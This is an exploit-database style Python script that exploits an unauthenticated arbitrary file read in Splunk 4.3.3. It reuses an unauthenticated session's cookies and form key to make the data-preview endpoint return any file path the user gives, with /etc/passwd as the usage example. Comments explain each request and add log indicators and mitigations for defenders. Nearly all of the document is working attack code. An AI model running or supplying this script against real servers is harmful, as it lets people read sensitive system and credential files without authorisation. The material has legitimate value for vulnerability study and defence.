# Exploit Title: Splunk 4.3.3 - Arbitrary File Read
# Date: 04/08/2021
# Exploit Author: krastanoel
# Vulnerability Discovery By: Marcio Almeida
# Vendor Homepage: http://www.splunk.com/
# Software Link: http://www.splunk.com/download?r=header
# Version: 4.3.3
# Tested on: Linux - Debian Buster
#!/usr/bin/env python
import json, re, requests, sys, time
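# Command-line handling. Three positional arguments are required: target
# address, Splunk Web port, and the path of the file to request.
# sys.argv[3] is read below, so sys.argv must hold at least four entries;
# a "< 3" guard lets a two-argument call fall through to an IndexError
# instead of showing the usage text.
if len(sys.argv) < 4:
    usage = """Usage: {} [ipaddr] [port] [filepath]
Example: {} 192.168.56.65 8000 /etc/passwd"""
    print(usage.format(sys.argv[0], sys.argv[0]))
    # sys.exit() instead of the site-injected exit(), which is not defined
    # when the interpreter is started without the site module.
    sys.exit()

ipaddr = sys.argv[1]
port = sys.argv[2]
filepath = sys.argv[3]
# Base URL of Splunk Web over plain HTTP, with the en-US locale prefix.
url = "http://{}:{}/en-US".format(ipaddr, port)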
# Request 1: fetch the login page. No credentials are submitted anywhere in
# this script; the response is used only for its session cookies and for the
# FORM_KEY value embedded in the page body.
login_page = requests.get(url + "/account/login")
cookies = login_page.cookies

# Pull the FORM_KEY value out of the page text. It is sent back later in the
# X-Splunk-Form-Key request header.
# NOTE(review): re.search() returns None when the page has no FORM_KEY, so
# .group(1) raises AttributeError on a target that does not serve this page.
form_key = re.search(
    '.*"FORM_KEY": "([^"]+)"', login_page.content.decode()
).group(1)
# Request 2: POST to the data-preview indexing endpoint, passing the
# caller-supplied path as 'input.path'. The request reuses the cookies and
# form key obtained from the login page, i.e. a session that never logged in.
#
# For defenders: a POST to this path from a session with no preceding
# successful login is the event to look for in Splunk Web or reverse-proxy
# access logs. The header of this file gives the affected version as 4.3.3;
# running a vendor-supported release and keeping Splunk Web off untrusted
# networks are the applicable mitigations.
preview_url = url + "/custom/splunk_datapreview/svc/-/-/indexing/preview"
headers = {'X-Requested-With': 'XMLHttpRequest', 'X-Splunk-Form-Key': form_key}
form = {
    'props.NO_BINARY_CHECK': 1,
    'props.sourcetype': '^^idontexistyet^^',
    'input.path': filepath,
}
r = requests.post(preview_url, cookies=cookies, headers=headers, data=form)

# The JSON reply carries a value at d.__messages[0].text; the next request
# places it in the search-jobs URL.
text = json.loads(r.content)['d']['__messages'][0]['text']

# Short pause before the results are requested.
time.sleep(1)
# Request 3: read the preview results for the value returned by the previous
# request, again with the unauthenticated session cookies.
results_url = url + "/custom/splunk_datapreview/svc/-/-/search/jobs/{}/results_preview?count=9999999".format(text)
payload = json.loads(requests.get(results_url, cookies=cookies).content)

# Each result row holds its line of text at _raw[0].value[0]; collect them all
# and print them joined by newlines.
# NOTE(review): any missing key is reported as "file is not found", which
# also covers a reply whose JSON shape differs from the one expected here.
try:
    lines = []
    for row in payload['d']['results']['data']:
        lines.append(row['_raw'][0]['value'][0])
    print("\n".join(lines))
except KeyError:
    print("{} file is not found".format(filepath))